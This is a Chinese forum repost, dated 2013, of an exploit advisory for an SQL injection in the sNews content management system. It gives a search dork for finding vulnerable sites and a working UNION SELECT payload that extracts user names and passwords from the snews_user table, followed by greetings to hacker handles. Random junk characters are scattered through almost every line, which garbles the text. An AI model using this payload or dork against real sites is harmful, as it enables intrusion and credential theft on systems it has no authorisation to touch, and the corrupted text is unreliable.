标题: CMS snews SQL Injection Vulnerability
6 S/ M7 V0 T- k3 n) S8 i# k$ A作者: By onestree
0 x- c8 D3 O- j9 }( e下载地址 : http://snewscms.com/1 k; f" g& M' \3 d0 k2 r% U. H$ `
测试平台 : ubuntu 12.10 / win 7( s4 N" h# G3 ^; R
关键词: inurl:"tanyakan pada rumput yang bergoyang"
$ t( N* i0 t V$ }6 [( |) H0 e ) O3 `0 ]% ?* P5 H! }* m
! s; I4 r" L& q$ O4 S% c' s*************************************************************' L. \. s% l1 ~& _& I2 d2 s
/ m" r& u" P* e' E% J' j0 a
SQL poc:
7 d3 ]5 E) N% l C 4 N& M+ a0 h" e9 T& o
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]1 S, e& {2 A% C, r: Q, R2 a& |
1 ~) x0 I5 i5 M
示例
0 I6 o! D" D- n, s: L! _ ' U, o, E0 n4 U$ f- Z& K0 F7 q/ e
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*9 b- ?# `0 M. G3 A
5 w$ y, F; r) e7 ]% E
. G$ W, {( [( A致谢:
6 `2 C; A, _) D& H; y, j2 [; } 4 s: Q0 ]* r9 g2 g0 ?+ j1 ~
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
+ F$ g( E V' Z6 u* [
# k* x4 |' Z+ T, m/ W indonesiancoder - moeslimh4x0r - go-coder
! V$ J/ ^2 ^# s1 F6 k( e
e: m* R7 v/ |! l# Q7 gspesial my hunny :*$ {3 _ C+ ~9 m3 X# s1 s2 i( Y: ]6 o/ S$ a
|
发表于 2013-1-23 08:55:06
收藏
支持
反对